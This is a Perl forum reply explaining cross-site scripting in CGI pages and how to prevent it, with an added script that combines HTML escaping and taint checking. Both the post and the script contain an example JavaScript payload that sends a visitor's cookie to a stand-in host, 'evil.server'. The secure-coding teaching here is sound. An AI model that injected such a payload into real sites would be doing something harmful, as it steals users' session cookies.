in reply to Back to acceptable untainted characters
Just to add my £0.02 to the excellent points raised already in this post, the other big issue you'll have when writing HTML from CGIs is avoiding Cross Site Scripting attacks (XSS).
Basically, most sites require users to log in via a form, and they then get given a cookie containing some form of session-id or authenticator, which allows the site to verify that they have successfully authenticated from then on.
So, if someone inserts some code like

    <script language="JavaScript">
      document.write("<img src='http://evil.server/" + document.cookie + ".jpg'>");
    </script>

into one of your forms, and this gets rendered onto a page, then anyone who looks at this page on the site will download the image from evil.server, and give evil.server their cookie. The server can then be configured to, for example, do an HTTP request to the password changing page and assign you a new password, or anything else that the site allows.
Your best bet when displaying HTML is to taint anything from the database that could contain a string (see the Taint module on CPAN, or use the TaintOut => 1 argument to DBI->connect to taint everything you read from the database automatically). This prevents you from accidentally forgetting to escape a string you meant to. Then, set up a regex to replace ' with &#39;, < with &lt; and so on. This will prevent such nasties from actually running.
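A worked version of the escape-and-taint approach described above, added here as an illustration and not code from the original post. The sub names `escape_html` and `emit` are my own, the comment string is a constructed stand-in for a row read from the database, and tainting it by appending a tainted empty substring of `$ENV{PATH}` stands in for what `TaintOut => 1` would do to real DBI results. Run it under `perl -T` so taint checking is actually on.

```perl
#!/usr/bin/perl -T
# Run as:  perl -T escape_demo.pl   (the -T switch must be on the command line)
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Replace the characters that let data break out of HTML text or attribute
# context. '&' goes first so the entities we produce are not re-escaped.
# The final regex capture is Perl's standard untainting idiom: only data
# that has passed through this escaping is marked safe to emit.
sub escape_html {
    my ($s) = @_;
    $s = '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    my ($clean) = $s =~ /\A(.*)\z/s;
    return $clean;
}

# Refuse to write anything still tainted: an unescaped database string
# reaching this function is a programming error, not a page to serve.
sub emit {
    my ($fragment) = @_;
    die "refusing to emit tainted data: $fragment\n" if tainted($fragment);
    print $fragment;
}

# Constructed stand-in for a comment read back from the database. Appending
# a tainted empty string (every %ENV value is tainted under -T) marks the
# whole value tainted, the same effect TaintOut => 1 has on DBI results.
my $comment = q{<script>document.write('<img src="http://evil.server/' + document.cookie + '.jpg">')</script>}
            . substr($ENV{PATH}, 0, 0);

# Escaped: the browser shows the script as literal text instead of running it.
emit('<p>' . escape_html($comment) . "</p>\n");

# Forgotten escape: the concatenation is still tainted, so emit() dies
# instead of silently serving the payload.
emit('<p>' . $comment . "</p>\n");
```

The point of routing every output through `emit` is that taint mode by itself does not stop `print`; it only stops system calls. The explicit `tainted` check turns a forgotten `escape_html` into a loud failure at development time rather than a stored XSS in production.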
Re: Back to acceptable untainted characters
by jonadab (Parson) on Sep 09, 2003 at 02:39 UTC